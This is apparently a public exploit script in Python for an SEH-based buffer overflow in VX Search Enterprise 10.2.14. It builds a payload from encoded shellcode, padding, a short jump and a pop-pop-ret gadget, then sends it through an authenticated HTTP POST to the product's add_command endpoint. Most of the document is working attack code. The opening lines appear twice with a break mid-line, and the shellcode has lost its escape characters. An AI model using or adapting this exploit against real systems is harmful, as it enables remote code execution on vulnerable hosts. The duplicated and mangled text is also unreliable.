VX Search Enterprise 10.2.14 Buffer Overflow

#!/usr/bin/python


print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) *** "

# Exploit Title : VX Search Enterprise v10. #!/usr/bin/python


print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) *** "

# Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
# Discovery by : W01fier00t
# Twitter : @wolfieroot
# Discovery Date : 22/11/2017
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Tested Version : 10.2.14
# Tested on OS : Windows 7 Home Edition sp1
# You will need to enable web server for this to work.
# You will also need the Login to VX Search wepage, for this to work.

import urllib
import urllib2
import socket

#Bad chars x00x0ax0d
#Payload size: 351 bytes
shellcode = (
"xddxc6xb8x4axecxd2xeaxd9x74x24xf4x5dx2bxc9xb1"
"x52x83xc5x04x31x45x13x03x0fxffx30x1fx73x17x36"
"xe0x8bxe8x57x68x6exd9x57x0exfbx4ax68x44xa9x66"
"x03x08x59xfcx61x85x6exb5xccxf3x41x46x7cxc7xc0"
"xc4x7fx14x22xf4x4fx69x23x31xadx80x71xeaxb9x37"
"x65x9fxf4x8bx0exd3x19x8cxf3xa4x18xbdxa2xbfx42"
"x1dx45x13xffx14x5dx70x3axeexd6x42xb0xf1x3ex9b"
"x39x5dx7fx13xc8x9fxb8x94x33xeaxb0xe6xcexedx07"
"x94x14x7bx93x3exdexdbx7fxbex33xbdxf4xccxf8xc9"
"x52xd1xffx1exe9xedx74xa1x3dx64xcex86x99x2cx94"
"xa7xb8x88x7bxd7xdax72x23x7dx91x9fx30x0cxf8xf7"
"xf5x3dx02x08x92x36x71x3ax3dxedx1dx76xb6x2bxda"
"x79xedx8cx74x84x0exedx5dx43x5axbdxf5x62xe3x56"
"x05x8ax36xf8x55x24xe9xb9x05x84x59x52x4fx0bx85"
"x42x70xc1xaexe9x8bx82x10x45x93x4axf9x94x93x74"
"x98x11x75xe2x4ax74x2ex9bxf3xddxa4x3axfbxcbxc1"
"x7dx77xf8x36x33x70x75x24xa4x70xc0x16x63x8exfe"
"x3exefx1dx65xbex66x3ex32xe9x2fxf0x4bx7fxc2xab"
"xe5x9dx1fx2dxcdx25xc4x8exd0xa4x89xabxf6xb6x57"
"x33xb3xe2x07x62x6dx5cxeexdcxdfx36xb8xb3x89xde"
"x3dxf8x09x98x41xd5xffx44xf3x80xb9x7bx3cx45x4e"
"x04x20xf5xb1xdfxe0x05xf8x7dx40x8exa5x14xd0xd3"
"x55xc3x17xeaxd5xe1xe7x09xc5x80xe2x56x41x79x9f"
"xc7x24x7dx0cxe7x6c")

#0x1001a136 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll]
cmdname = "x90" *16
cmdname += shellcode
cmdname += "A" * 157
cmdname += "xEBx06"
cmdname += "B" *2
cmdname += "x36xa1x01x10"

print " [*] Sending payload!..."
url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
values = {'command_name' : cmdname}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)

try:
response = urllib2.urlopen(req, timeout = 1)
except socket.timeout:
pass

print " [*] DONE! :D "